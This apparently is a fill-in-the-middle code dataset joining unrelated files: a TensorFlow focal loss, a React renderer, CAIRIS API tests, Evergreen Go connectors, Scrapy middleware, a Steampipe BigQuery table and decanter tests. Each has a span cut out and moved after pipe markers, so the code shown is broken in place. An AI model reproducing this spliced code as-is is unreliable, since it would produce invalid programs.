labels: A int32 tensor of shape [batch_size].
logits: A float32 tensor of shape [batch_size,num_classes].
gamma: A scalar for focal loss gamma hyper-parameter.
Returns:
A tensor of the same shape as `lables`
"""
with tf.name_scope("focal_loss"):
y_pred = tf.nn.softmax(logits, dim=-1) # [batch_size,num_classes]
labels = tf.one_hot(labels, depth=y_pred.shape[1])
L = -labels * ((1 - y_pred)**gamma) * tf.log(y_pred)
L = tf.reduce_sum(L, axis=1)
return L
'''
if __name__ == '__main__':
labels = tf.constant([0, 1], name="labels")
logits = tf.constant([[0.7, 0.2, 0.1], [0.6, 0.1, 0.3]], name="logits")
a = tf.reduce_mean(sparse_focal_loss(logits, tf.stop_gradient(labels)))
with tf.Session() as sess:
print(sess.run(a))'''
| logits, labels, g |
index.js | import React, { Component } from 'react'
import PropTypes from 'prop-types'
export default class JSON2React extends Component {
static propTypes = {
elements: PropTypes.array
}
renderElements=(elements) => {
return elements.map((element, ix) =>
React.createElement(
element.type,
{ className: element.className, style: element.style, href: element.href, src: element.src, key: element.type + '-' + ix }, element.data || (element.children && element.children.length > 0 && this.renderElements(element.children))
)
)
}
render() {
const {
elements
} = this.props
return (
<div>
{this.renderElements(elements)}
</div>
)
} | } |
|
test_GoalAPI.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
from urllib import quote
import jsonpickle
from cairis.core.Goal import Goal
from cairis.core.GoalEnvironmentProperties import GoalEnvironmentProperties
from cairis.test.CairisDaemonTestCase import CairisDaemonTestCase
import os
from cairis.mio.ModelImport import importModelFile
__author__ = 'Robin Quetin, Shamal Faily'
class GoalAPITests(CairisDaemonTestCase):
@classmethod
def setUpClass(cls):
importModelFile(os.environ['CAIRIS_SRC'] + '/../examples/exemplars/NeuroGrid/NeuroGrid.xml',1,'test')
def setUp(self):
# region Class fields
self.logger = logging.getLogger(__name__)
self.existing_goal_name = 'Multi-Factor Authentication'
self.existing_category = 'Maintain'
self.existing_environment_name_1 = 'Stroke'
self.existing_environment_name_2 = 'Psychosis'
self.goal_class = Goal.__module__+'.'+Goal.__name__
self.to_delete_ids = []
# endregion
def test_get_all(self):
method = 'test_get_all'
rv = self.app.get('/api/goals?session_id=test')
goals = jsonpickle.decode(rv.data)
self.assertIsNotNone(goals, 'No results after deserialization')
self.assertIsInstance(goals, dict, 'The result is not a dictionary as expected')
self.assertGreater(len(goals), 0, 'No goals in the dictionary')
self.logger.info('[%s] Goals found: %d', method, len(goals))
goal = goals.values()[0]
self.logger.info('[%s] First goal: %s [%d]\n', method, goal['theName'], goal['theId'])
def test_get_by_name(self):
method = 'test_get_by_name'
url = '/api/goals/name/%s?session_id=test' % quote(self.existing_goal_name)
rv = self.app.get(url)
self.assertIsNotNone(rv.data, 'No response')
self.logger.debug('[%s] Response data: %s', method, rv.data)
goal = jsonpickle.decode(rv.data)
self.assertIsNotNone(goal, 'No results after deserialization')
self.logger.info('[%s] Goal: %s [%d]\n', method, goal['theName'], goal['theId'])
def test_delete(self):
method = 'test_delete'
url = '/api/goals/name/%s?session_id=test' % quote(self.prepare_new_goal().theName)
new_goal_body = self.prepare_json()
self.app.delete(url)
self.logger.info('[%s] Object to delete: %s', method, new_goal_body)
self.app.post('/api/goals', content_type='application/json', data=new_goal_body)
self.logger.info('[%s] URL: %s', method, url)
rv = self.app.delete(url)
self.logger.info('[%s] Response data: %s', method, rv.data)
self.assertIsNotNone(rv.data, 'No response')
json_resp = jsonpickle.decode(rv.data)
self.assertIsInstance(json_resp, dict, 'The response cannot be converted to a dictionary')
message = json_resp.get('message', None)
self.assertIsNotNone(message, 'No message in response')
self.logger.info('[%s] Message: %s\n', method, message)
def test_post(self):
method = 'test_post'
url = '/api/goals'
self.logger.info('[%s] URL: %s', method, url)
new_goal_body = self.prepare_json()
self.app.delete('/api/goals/name/%s?session_id=test' % quote(self.prepare_new_goal().theName))
rv = self.app.post(url, content_type='application/json', data=new_goal_body)
self.logger.debug('[%s] Response data: %s', method, rv.data)
json_resp = jsonpickle.decode(rv.data)
self.assertIsNotNone(json_resp, 'No results after deserialization')
env_id = json_resp.get('goal_id', None)
self.assertIsNotNone(env_id, 'No goal ID returned')
self.assertGreater(env_id, 0, 'Invalid goal ID returned [%d]' % env_id)
self.logger.info('[%s] Goal ID: %d\n', method, env_id)
rv = self.app.delete('/api/goals/name/%s?session_id=test' % quote(self.prepare_new_goal().theName))
def test_put(self):
method = 'test_put'
url = '/api/goals'
self.logger.info('[%s] URL: %s', method, url)
new_goal_body = self.prepare_json()
rv = self.app.delete('/api/goals/name/%s?session_id=test' % quote(self.prepare_new_goal().theName))
rv = self.app.post(url, content_type='application/json', data=new_goal_body)
self.logger.debug('[%s] Response data: %s', method, rv.data)
json_resp = jsonpickle.decode(rv.data)
self.assertIsNotNone(json_resp, 'No results after deserialization')
env_id = json_resp.get('goal_id', None)
self.assertIsNotNone(env_id, 'No goal ID returned')
self.assertGreater(env_id, 0, 'Invalid goal ID returned [%d]' % env_id)
self.logger.info('[%s] Goal ID: %d', method, env_id)
goal_to_update = self.prepare_new_goal()
goal_to_update.theName = 'Edited test goal'
goal_to_update.theId = env_id
upd_env_body = self.prepare_json(goal=goal_to_update)
rv = self.app.put('/api/goals/name/%s?session_id=test' % quote(self.prepare_new_goal().theName), data=upd_env_body, content_type='application/json')
self.assertIsNotNone(rv.data, 'No response')
json_resp = jsonpickle.decode(rv.data)
self.assertIsNotNone(json_resp)
self.assertIsInstance(json_resp, dict)
message = json_resp.get('message', None)
self.assertIsNotNone(message, 'No message in response')
self.logger.info('[%s] Message: %s', method, message)
self.assertGreater(message.find('successfully updated'), -1, 'The goal was not successfully updated')
rv = self.app.get('/api/goals/name/%s?session_id=test' % quote(goal_to_update.theName))
upd_goal = jsonpickle.decode(rv.data)
self.assertIsNotNone(upd_goal, 'Unable to decode JSON data')
self.logger.debug('[%s] Response data: %s', method, rv.data)
self.logger.info('[%s] Goal: %s [%d]\n', method, upd_goal['theName'], upd_goal['theId'])
rv = self.app.delete('/api/goals/name/%s?session_id=test' % quote(goal_to_update.theName))
def prepare_new_goal(self):
new_goal_refinements = [
[
"PreventUnauthorised Certificate Access",
"goal",
"or",
"No",
"None"
]
]
new_subgoal_refinements = [
[
"PreventUnauthorised Certificate Access",
"goal",
"or",
"No",
"None"
]
]
new_goal_props = [
GoalEnvironmentProperties(
environmentName=self.existing_environment_name_1,
lbl='Test 1',
definition='This is a first test property',
category=self.existing_category,
priority='Medium',
fitCriterion='None',
issue='None',
goalRefinements=new_goal_refinements,
subGoalRefinements=new_subgoal_refinements,
concs=[],cas=[]
),
GoalEnvironmentProperties(
environmentName=self.existing_environment_name_2,
lbl='Test 2',
definition='This is a second test property',
category=self.existing_category,
priority='Low',
fitCriterion='None',
issue='Test issue',
goalRefinements=new_goal_refinements,
subGoalRefinements=new_subgoal_refinements,
concs=[],cas=[]
)
]
new_goal = Goal(
goalId=-1,
goalName='Test goal',
goalOrig='',
tags=['test', 'test123'],
environmentProperties=[]
)
new_goal.theEnvironmentProperties = new_goal_props
new_goal.theEnvironmentDictionary = {}
new_goal.theGoalPropertyDictionary = {}
delattr(new_goal, 'theEnvironmentDictionary')
delattr(new_goal, 'theGoalPropertyDictionary')
return new_goal
def prepare_dict(self, goal=None):
if goal is None:
goal = self.prepare_new_goal()
else:
assert isinstance(goal, Goal)
return {
'session_id': 'test',
'object': goal,
}
def | (self, data_dict=None, goal=None):
if data_dict is None:
data_dict = self.prepare_dict(goal=goal)
else:
assert isinstance(data_dict, dict)
new_goal_body = jsonpickle.encode(data_dict, unpicklable=False)
self.logger.info('JSON data: %s', new_goal_body)
return new_goal_body
| prepare_json |
version.go | package data
import (
"context"
"fmt"
"net/http"
"sort"
"github.com/evergreen-ci/evergreen"
"github.com/evergreen-ci/evergreen/model"
"github.com/evergreen-ci/evergreen/model/build"
"github.com/evergreen-ci/evergreen/model/task"
"github.com/evergreen-ci/evergreen/repotracker"
restModel "github.com/evergreen-ci/evergreen/rest/model"
"github.com/evergreen-ci/gimlet"
"github.com/mongodb/grip"
"github.com/pkg/errors"
)
// DBVersionConnector is a struct that implements Version related methods
// from the Connector through interactions with the backing database.
type DBVersionConnector struct{}
// FindCostByVersionId queries the backing database for cost data associated
// with the given versionId. This is done by aggregating TimeTaken over all tasks
// of the given model.Version
func (vc *DBVersionConnector) FindCostByVersionId(versionId string) (*task.VersionCost, error) {
pipeline := task.CostDataByVersionIdPipeline(versionId)
res := []task.VersionCost{}
if err := task.Aggregate(pipeline, &res); err != nil {
return nil, err
}
if len(res) > 1 {
return nil, fmt.Errorf("aggregation query with version_id %s returned %d results but should only return 1 result", versionId, len(res))
}
if len(res) == 0 {
return nil, gimlet.ErrorResponse{
StatusCode: http.StatusNotFound,
Message: fmt.Sprintf("version with id %s not found", versionId),
}
}
return &res[0], nil
}
// FindVersionById queries the backing database for the version with the given versionId.
func (vc *DBVersionConnector) FindVersionById(versionId string) (*model.Version, error) {
v, err := model.VersionFindOne(model.VersionById(versionId))
if err != nil {
return nil, err
}
if v == nil {
return nil, gimlet.ErrorResponse{
StatusCode: http.StatusNotFound,
Message: fmt.Sprintf("version with id %s not found", versionId),
}
}
return v, nil
}
func (vc *DBVersionConnector) FindVersionByProjectAndRevision(projectId, revision string) (*model.Version, error) {
return model.VersionFindOne(model.BaseVersionByProjectIdAndRevision(projectId, revision))
}
func (vc *DBVersionConnector) AddGitTagToVersion(versionId string, gitTag model.GitTag) error {
return model.AddGitTag(versionId, gitTag)
}
// AbortVersion aborts all tasks of a version given its ID.
// It wraps the service level AbortModel.Version
func (vc *DBVersionConnector) AbortVersion(versionId, caller string) error {
return task.AbortVersion(versionId, task.AbortInfo{User: caller})
}
// RestartVersion wraps the service level RestartVersion, which restarts
// completed tasks associated with a given versionId. If abortInProgress is
// true, it also sets the abort flag on any in-progress tasks. In addition, it
// updates all builds containing the tasks affected.
func (vc *DBVersionConnector) RestartVersion(versionId string, caller string) error {
// Get a list of all tasks of the given versionId
tasks, err := task.Find(task.ByVersion(versionId))
if err != nil {
return err
}
if tasks == nil {
return gimlet.ErrorResponse{
StatusCode: http.StatusNotFound,
Message: fmt.Sprintf("version with id %s not found", versionId),
}
}
var taskIds []string
for _, task := range tasks {
taskIds = append(taskIds, task.Id)
}
return model.RestartVersion(versionId, taskIds, true, caller)
}
func (bc *DBVersionConnector) LoadProjectForVersion(v *model.Version, projectId string) (*model.Project, *model.ParserProject, error) {
return model.LoadProjectForVersion(v, projectId, false)
}
// Fetch versions until 'numVersionElements' elements are created, including
// elements consisting of multiple versions rolled-up into one.
// The skip value indicates how many versions back in time should be skipped
// before starting to fetch versions, the project indicates which project the
// returned versions should be a part of.
func (vc *DBVersionConnector) GetVersionsAndVariants(skip, numVersionElements int, project *model.Project) (*restModel.VersionVariantData, error) {
// the final array of versions to return
finalVersions := []restModel.APIVersions{}
// list of builds that are in the search results, analogous to a row in the waterfall
buildList := map[string]restModel.BuildList{}
// buildvariant names that have at least 1 active version
buildVariants := []string{}
// build variant mappings - used so we can store the display name as
// the build variant field of a build
buildVariantMappings := project.GetVariantMappings()
// keep track of the last rolled-up version, so inactive versions can
// be added
var lastRolledUpVersion *restModel.APIVersions
// loop until we have enough from the db
for len(finalVersions) < numVersionElements {
// fetch the versions and associated builds
versionsFromDB, buildsByVersion, err :=
model.FetchVersionsAndAssociatedBuilds(project, skip, numVersionElements, true)
if err != nil {
return nil, errors.Wrap(err,
"error fetching versions and builds")
}
// if we've reached the beginning of all versions
if len(versionsFromDB) == 0 {
break
}
// to fetch started tasks and failed tests for providing additional context
// in a tooltip
failedAndStartedTaskIds := []string{}
// update the amount skipped
skip += len(versionsFromDB)
// create the necessary versions, rolling up inactive ones
for _, versionFromDB := range versionsFromDB {
// if we have hit enough versions, break out | // the builds for the version
buildsInVersion := buildsByVersion[versionFromDB.Id]
// see if there are any active tasks in the version
versionActive := anyActiveTasks(buildsInVersion)
// add any represented build variants to the set and initialize rows
for _, b := range buildsInVersion {
displayName := buildVariantMappings[b.BuildVariant]
if displayName == "" {
displayName = b.BuildVariant
}
buildVariants = append(buildVariants, displayName)
buildVariant := buildVariantMappings[b.BuildVariant]
if buildVariant == "" {
buildVariant = b.BuildVariant
}
if _, ok := buildList[b.BuildVariant]; !ok {
buildList[b.BuildVariant] = restModel.BuildList{
Builds: map[string]restModel.APIBuild{},
BuildVariant: buildVariant,
}
}
}
// if it is inactive, roll up the version and don't create any
// builds for it
if !versionActive {
if lastRolledUpVersion == nil {
lastRolledUpVersion = &restModel.APIVersions{RolledUp: true, Versions: []restModel.APIVersion{}}
}
// add the version data into the last rolled-up version
newVersion := restModel.APIVersion{}
err = newVersion.BuildFromService(&versionFromDB)
if err != nil {
return nil, errors.Wrapf(err, "error converting version %s from DB model", versionFromDB.Id)
}
lastRolledUpVersion.Versions = append(lastRolledUpVersion.Versions, newVersion)
// move on to the next version
continue
}
// add a pending rolled-up version, if it exists
if lastRolledUpVersion != nil {
finalVersions = append(finalVersions, *lastRolledUpVersion)
lastRolledUpVersion = nil
}
// if we have hit enough versions, break out
if len(finalVersions) == numVersionElements {
break
}
// if the version can not be rolled up, create a fully fledged
// version for it
activeVersion := restModel.APIVersion{}
err = activeVersion.BuildFromService(&versionFromDB)
if err != nil {
return nil, errors.Wrapf(err, "error converting version %s from DB model", versionFromDB.Id)
}
// add the builds to the "row"
for _, b := range buildsInVersion {
currentRow := buildList[b.BuildVariant]
buildsForRow := restModel.APIBuild{}
err = buildsForRow.BuildFromService(b)
if err != nil {
return nil, errors.Wrapf(err, "error converting build %s from DB model", b.Id)
}
currentRow.Builds[versionFromDB.Id] = buildsForRow
buildList[b.BuildVariant] = currentRow
for _, task := range buildsForRow.TaskCache {
if task.Status == evergreen.TaskFailed || task.Status == evergreen.TaskStarted {
failedAndStartedTaskIds = append(failedAndStartedTaskIds, task.Id)
}
}
}
// add the version
finalVersions = append(finalVersions, restModel.APIVersions{RolledUp: false, Versions: []restModel.APIVersion{activeVersion}})
}
if err = addFailedAndStartedTests(buildList, failedAndStartedTaskIds); err != nil {
return nil, err
}
}
// if the last version was rolled-up, add it
if lastRolledUpVersion != nil {
finalVersions = append(finalVersions, *lastRolledUpVersion)
}
return &restModel.VersionVariantData{
Rows: buildList,
Versions: finalVersions,
BuildVariants: buildVariants,
}, nil
}
// Takes in a slice of tasks, and determines whether any of the tasks in
// any of the builds are active.
func anyActiveTasks(builds []build.Build) bool {
for _, build := range builds {
for _, task := range build.Tasks {
if task.Activated {
return true
}
}
}
return false
}
// addFailedAndStartedTests adds all of the failed tests associated with a task
func addFailedAndStartedTests(rows map[string]restModel.BuildList, failedAndStartedTaskIds []string) error {
failedAndStartedTasks, err := task.Find(task.ByIds(failedAndStartedTaskIds))
if err != nil {
return errors.Wrap(err, "error fetching failed tasks")
}
for i := range failedAndStartedTasks {
if err := failedAndStartedTasks[i].MergeNewTestResults(); err != nil {
return errors.Wrap(err, "error merging test results")
}
}
failedTestsByTaskId := map[string][]string{}
for _, t := range failedAndStartedTasks {
failedTests := []string{}
for _, r := range t.LocalTestResults {
if r.Status == evergreen.TestFailedStatus {
failedTests = append(failedTests, r.TestFile)
}
}
failedTestsByTaskId[t.Id] = failedTests
}
for buildVariant, row := range rows {
for versionId, build := range row.Builds {
for i, task := range build.TaskCache {
if len(failedTestsByTaskId[task.Id]) != 0 {
rows[buildVariant].Builds[versionId].TaskCache[i].FailedTestNames = append(
rows[buildVariant].Builds[versionId].TaskCache[i].FailedTestNames,
failedTestsByTaskId[task.Id]...)
sort.Strings(rows[buildVariant].Builds[versionId].TaskCache[i].FailedTestNames)
}
}
}
}
return nil
}
func (vc *DBVersionConnector) CreateVersionFromConfig(ctx context.Context, projectInfo *model.ProjectInfo,
metadata model.VersionMetadata, active bool) (*model.Version, error) {
newVersion, err := repotracker.CreateVersionFromConfig(ctx, projectInfo, metadata, false, nil)
if err != nil {
return nil, gimlet.ErrorResponse{
StatusCode: http.StatusInternalServerError,
Message: fmt.Sprintf("error creating version: %s", err.Error()),
}
}
if active {
catcher := grip.NewBasicCatcher()
for _, b := range newVersion.BuildIds {
catcher.Add(model.SetBuildActivation(b, true, evergreen.DefaultTaskActivator, true))
}
if catcher.HasErrors() {
return nil, gimlet.ErrorResponse{
StatusCode: http.StatusInternalServerError,
Message: fmt.Sprintf("error activating builds: %s", catcher.Resolve().Error()),
}
}
}
return newVersion, nil
}
// MockVersionConnector stores a cached set of tasks that are queried against by the
// implementations of the Connector interface's Version related functions.
type MockVersionConnector struct {
CachedTasks []task.Task
CachedVersions []model.Version
CachedRestartedVersions map[string]string
}
// FindCostByVersionId is the mock implementation of the function for the Connector interface
// without needing to use a database. It returns results based on the cached tasks in the MockVersionConnector.
func (mvc *MockVersionConnector) FindCostByVersionId(versionId string) (*task.VersionCost, error) {
vc := task.VersionCost{
VersionId: "",
SumTimeTaken: 0,
}
// Simulate aggregation
for _, t := range mvc.CachedTasks {
if t.Version == versionId {
if vc.VersionId == "" {
vc.VersionId = versionId
}
vc.SumTimeTaken += t.TimeTaken
}
}
// Throw an error when no task with the given version id is found
if vc.VersionId == "" {
return nil, fmt.Errorf("no task with version_id %s has been found", versionId)
}
return &vc, nil
}
// FindVersionById is the mock implementation of the function for the Connector interface
// without needing to use a database. It returns results based on the cached versions in the MockVersionConnector.
func (mvc *MockVersionConnector) FindVersionById(versionId string) (*model.Version, error) {
for _, v := range mvc.CachedVersions {
if v.Id == versionId {
return &v, nil
}
}
return nil, gimlet.ErrorResponse{
StatusCode: http.StatusNotFound,
Message: fmt.Sprintf("build with id %s not found", versionId),
}
}
func (mvc *MockVersionConnector) FindVersionByProjectAndRevision(projectId, revision string) (*model.Version, error) {
for _, v := range mvc.CachedVersions {
if v.Identifier == projectId && v.Revision == revision {
return &v, nil
}
}
return nil, nil
}
func (mvc *MockVersionConnector) AddGitTagToVersion(versionId string, gitTag model.GitTag) error {
for _, v := range mvc.CachedVersions {
if v.Id == versionId {
v.GitTags = append(v.GitTags, gitTag)
}
}
return errors.New("no version found")
}
// AbortVersion aborts all tasks of a version given its ID. Specifically, it sets the
// Aborted key of the tasks to true if they are currently in abortable statuses.
func (mvc *MockVersionConnector) AbortVersion(versionId, caller string) error {
for idx, t := range mvc.CachedTasks {
if t.Version == versionId && (t.Status == evergreen.TaskStarted || t.Status == evergreen.TaskDispatched) {
if !t.Aborted {
pt := &mvc.CachedTasks[idx]
pt.Aborted = true
}
}
}
return nil
}
// The main function of the RestartVersion() for the MockVersionConnector is to
// test connectivity. It sets the value of versionId in CachedRestartedVersions
// to the caller.
func (mvc *MockVersionConnector) RestartVersion(versionId string, caller string) error {
mvc.CachedRestartedVersions[versionId] = caller
return nil
}
func (mvc *MockVersionConnector) GetVersionsAndVariants(skip, numVersionElements int, project *model.Project) (*restModel.VersionVariantData, error) {
return nil, nil
}
func (mvc *MockVersionConnector) CreateVersionFromConfig(ctx context.Context, projectInfo *model.ProjectInfo, metadata model.VersionMetadata, active bool) (*model.Version, error) {
return nil, nil
}
func (mvc *MockVersionConnector) LoadProjectForVersion(v *model.Version, projectId string) (*model.Project, *model.ParserProject, error) {
if v.Config != "" {
p := &model.Project{}
pp, err := model.LoadProjectInto([]byte(v.Config), projectId, p)
return p, pp, err
}
return nil, nil, errors.New("no project for version")
} | if len(finalVersions) == numVersionElements {
break
}
|
middlewares.py | # -*- coding: utf-8 -*-
# Define here the models for your spider middleware
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
from scrapy import signals
class QiubaiSpiderMiddleware(object):
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the spider middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_spider_input(self, response, spider):
# Called for each response that goes through the spider
# middleware and into the spider.
# Should return None or raise an exception.
return None
def process_spider_output(self, response, result, spider):
# Called with the results returned from the Spider, after
# it has processed the response.
# Must return an iterable of Request, dict or Item objects.
for i in result:
yield i
def process_spider_exception(self, response, exception, spider):
# Called when a spider or process_spider_input() method
# (from other spider middleware) raises an exception.
# Should return either None or an iterable of Response, dict
# or Item objects.
pass
def process_start_requests(self, start_requests, spider):
# Called with the start requests of the spider, and works
# similarly to the process_spider_output() method, except
# that it doesn’t have a response associated.
# Must return only requests (not items).
for r in start_requests:
yield r
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
class QiubaiDownloaderMiddleware(object):
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the downloader middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_request(self, request, spider):
# Called for each request that goes through the downloader
# middleware.
# Must either:
# - return None: continue processing this request
# - or return a Response object
# - or return a Request object
# - or raise IgnoreRequest: process_exception() methods of
# installed downloader middleware will be called
return None
def pr | elf, request, response, spider):
# Called with the response returned from the downloader.
# Must either;
# - return a Response object
# - return a Request object
# - or raise IgnoreRequest
return response
def process_exception(self, request, exception, spider):
# Called when a download handler or a process_request()
# (from other downloader middleware) raises an exception.
# Must either:
# - return None: continue processing this exception
# - return a Response object: stops process_exception() chain
# - return a Request object: stops process_exception() chain
pass
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
| ocess_response(s |
06_01_name_conflict.py | def | ():
pass
print() | print |
table_gcp_bigquery_dataset.go | package gcp
import (
"context"
"strings"
"github.com/turbot/steampipe-plugin-sdk/grpc/proto"
"github.com/turbot/steampipe-plugin-sdk/plugin"
"github.com/turbot/steampipe-plugin-sdk/plugin/transform"
"google.golang.org/api/bigquery/v2"
)
//// TABLE DEFINITION
func tableGcpBigQueryDataset(ctx context.Context) *plugin.Table {
return &plugin.Table{
Name: "gcp_bigquery_dataset",
Description: "GCP BigQuery Dataset",
Get: &plugin.GetConfig{
KeyColumns: plugin.SingleColumn("dataset_id"),
Hydrate: getBigQueryDataset,
},
List: &plugin.ListConfig{
Hydrate: listBigQueryDatasets,
ShouldIgnoreError: isIgnorableError([]string{"403"}),
},
Columns: []*plugin.Column{
{
Name: "name",
Description: "A descriptive name for the dataset, if one exists.",
Type: proto.ColumnType_STRING,
Transform: transform.FromField("FriendlyName"),
},
{
Name: "dataset_id",
Description: "The ID of the dataset resource.",
Type: proto.ColumnType_STRING,
Transform: transform.FromField("DatasetReference.DatasetId"),
},
{
Name: "id",
Description: "The fully-qualified, unique, opaque ID of the dataset.",
Type: proto.ColumnType_STRING,
},
{
Name: "kind",
Description: "The type of the resource. This property always returns the value 'bigquery#dataset'.",
Type: proto.ColumnType_STRING,
},
{
Name: "creation_time",
Description: "The time when this dataset was created.",
Type: proto.ColumnType_TIMESTAMP,
Hydrate: getBigQueryDataset,
Transform: transform.FromField("CreationTime").Transform(transform.UnixMsToTimestamp),
},
{
Name: "description",
Description: "A user-friendly description of the dataset.",
Type: proto.ColumnType_STRING,
Hydrate: getBigQueryDataset,
},
{
Name: "etag",
Description: "A hash of the resource.",
Type: proto.ColumnType_STRING,
Hydrate: getBigQueryDataset,
},
{
Name: "default_partition_expiration_ms",
Description: "The default partition expiration for all partitioned tables in the dataset, in milliseconds.",
Type: proto.ColumnType_INT,
Hydrate: getBigQueryDataset,
},
{
Name: "default_table_expiration_ms",
Description: "The default lifetime of all tables in the dataset, in milliseconds.",
Type: proto.ColumnType_INT,
Hydrate: getBigQueryDataset,
},
{
Name: "kms_key_name",
Description: "Describes the Cloud KMS encryption key that will be used to protect destination BigQuery table.",
Type: proto.ColumnType_STRING,
Hydrate: getBigQueryDataset,
Transform: transform.FromField("DefaultEncryptionConfiguration.KmsKeyName"),
},
{
Name: "last_modified_time",
Description: "The date when this dataset or any of its tables was last modified.",
Type: proto.ColumnType_TIMESTAMP,
Hydrate: getBigQueryDataset,
Transform: transform.FromField("LastModifiedTime").Transform(transform.UnixMsToTimestamp),
},
{
Name: "self_link",
Description: "An URL that can be used to access the resource again.",
Type: proto.ColumnType_STRING,
Hydrate: getBigQueryDataset,
},
{
Name: "access",
Description: "An array of objects that define dataset access for one or more entities.",
Type: proto.ColumnType_JSON,
Hydrate: getBigQueryDataset,
},
{
Name: "labels",
Description: "A set of labels associated with this dataset.",
Type: proto.ColumnType_JSON,
},
// standard steampipe columns
{
Name: "title",
Description: ColumnDescriptionTitle,
Type: proto.ColumnType_STRING,
Transform: transform.From(bigQueryDatasetTitle),
},
{
Name: "tags",
Description: ColumnDescriptionTags,
Type: proto.ColumnType_JSON,
Transform: transform.FromField("Labels"),
},
{
Name: "akas",
Description: ColumnDescriptionAkas,
Type: proto.ColumnType_JSON,
Transform: transform.From(bigQueryDatasetAka),
},
// standard gcp columns
{
Name: "location",
Description: ColumnDescriptionLocation,
Type: proto.ColumnType_STRING,
},
{
Name: "project",
Description: ColumnDescriptionProject,
Type: proto.ColumnType_STRING,
Transform: transform.FromField("DatasetReference.ProjectId"),
},
},
}
}
//// LIST FUNCTION
func listBigQueryDatasets(ctx context.Context, d *plugin.QueryData, _ *plugin.HydrateData) (interface{}, error) |
//// HYDRATE FUNCTIONS
func getBigQueryDataset(ctx context.Context, d *plugin.QueryData, h *plugin.HydrateData) (interface{}, error) {
// Create Service Connection
service, err := BigQueryService(ctx, d)
if err != nil {
return nil, err
}
// Get project details
projectData, err := activeProject(ctx, d)
if err != nil {
return nil, err
}
project := projectData.Project
var id string
if h.Item != nil {
data := datasetID(h.Item)
id = strings.Split(data, ":")[1]
} else {
id = d.KeyColumnQuals["dataset_id"].GetStringValue()
}
resp, err := service.Datasets.Get(project, id).Do()
if err != nil {
return nil, err
}
return resp, nil
}
//// TRANSFORM FUNCTIONS
func bigQueryDatasetAka(ctx context.Context, h *transform.TransformData) (interface{}, error) {
data := datasetID(h.HydrateItem)
projectID := strings.Split(data, ":")[0]
id := strings.Split(data, ":")[1]
akas := []string{"gcp://bigquery.googleapis.com/projects/" + projectID + "/datasets/" + id}
return akas, nil
}
func bigQueryDatasetTitle(ctx context.Context, h *transform.TransformData) (interface{}, error) {
data := datasetID(h.HydrateItem)
name := datasetName(h.HydrateItem)
if len(name) > 0 {
return name, nil
}
return strings.Split(data, ":")[1], nil
}
func datasetID(item interface{}) string {
switch item := item.(type) {
case *bigquery.DatasetListDatasets:
return item.Id
case *bigquery.Dataset:
return item.Id
}
return ""
}
func datasetName(item interface{}) string {
switch item := item.(type) {
case *bigquery.DatasetListDatasets:
return item.FriendlyName
case *bigquery.Dataset:
return item.FriendlyName
}
return ""
}
| {
plugin.Logger(ctx).Trace("listBigQueryDatasets")
// Create Service Connection
service, err := BigQueryService(ctx, d)
if err != nil {
return nil, err
}
// Get project details
projectData, err := activeProject(ctx, d)
if err != nil {
return nil, err
}
project := projectData.Project
resp := service.Datasets.List(project)
if err := resp.Pages(ctx, func(page *bigquery.DatasetList) error {
for _, dataset := range page.Datasets {
d.StreamListItem(ctx, dataset)
}
return nil
}); err != nil {
return nil, err
}
return nil, nil
} |
test_data.py | # pylint: disable=redefined-builtin
# pylint: disable=too-many-arguments
"""Test related method and functionality of Context."""
import pytest
import responses
from decanter.core import Context
from decanter.core.core_api import TrainInput
from decanter.core.extra import CoreStatus
from decanter.core.jobs import DataUpload
fail_conds = [(stat, res) for stat in CoreStatus.FAIL_STATUS for res in [None, 'result']]
fail_conds.append((CoreStatus.DONE, None))
@responses.activate
def test_data_success(
globals, client, mock_test_responses, context_fixture):
"""DataUpload gets the id and result when upload csv file or datafram."""
context = context_fixture('Healthy')
mock_test_responses(task='upload', status=CoreStatus.DONE)
data = client.upload(file=globals['test_csv_file'])
data_ = client.upload(file=globals['test_df'])
context.run()
assert data.task.id == data_.task.id == globals['upload']
assert data.id == data_.id == globals['data']
assert data.status == data_.status == CoreStatus.DONE
assert data.result == data_.result == globals['results']['upload']
@responses.activate
@pytest.mark.parametrize('status, result', fail_conds)
def test_data_fail(
globals, client, status, result, mock_test_responses, context_fixture):
"""DataUpload fails when status and result create fail conditions."""
context = context_fixture('Healthy')
mock_test_responses(task='upload', status=status, task_result=result)
data = client.upload(file=globals['test_csv_file'])
context.run()
assert data.task.id == globals['upload']
assert data.id is None
assert data.status == status
assert data.result == result
@responses.activate
def test_no_file(client, mock_test_responses, context_fixture):
"""Raise exceptions when upload empty files."""
context_fixture('Healthy')
mock_test_responses(task='upload')
with pytest.raises(Exception):
client.upload(file=None)
@responses.activate
@pytest.mark.parametrize('status', [CoreStatus.PENDING, CoreStatus.RUNNING, CoreStatus.FAIL])
def test_data_stop(
globals, urls, client, status, mock_test_responses, context_fixture):
"""DataUpload status is fail if stopped during pending, running, and fail status,
remains if in done status. The experiment following will failed if data
failed.
"""
async def | (data):
data.stop()
return
context = context_fixture('Healthy')
mock_test_responses(task='upload', status=status)
mock_test_responses(task='train', status=CoreStatus.DONE)
responses.add(
responses.PUT, urls('stop', 'upload'),
json={
'message': 'task removed'
},
status=200,
content_type='application/json')
if status == CoreStatus.DONE:
data = DataUpload()
data.status = CoreStatus.DONE
else:
data = client.upload(file=globals['test_csv_file'])
exp = client.train(TrainInput(
data=data, target='test-target', algos=['test-algo']))
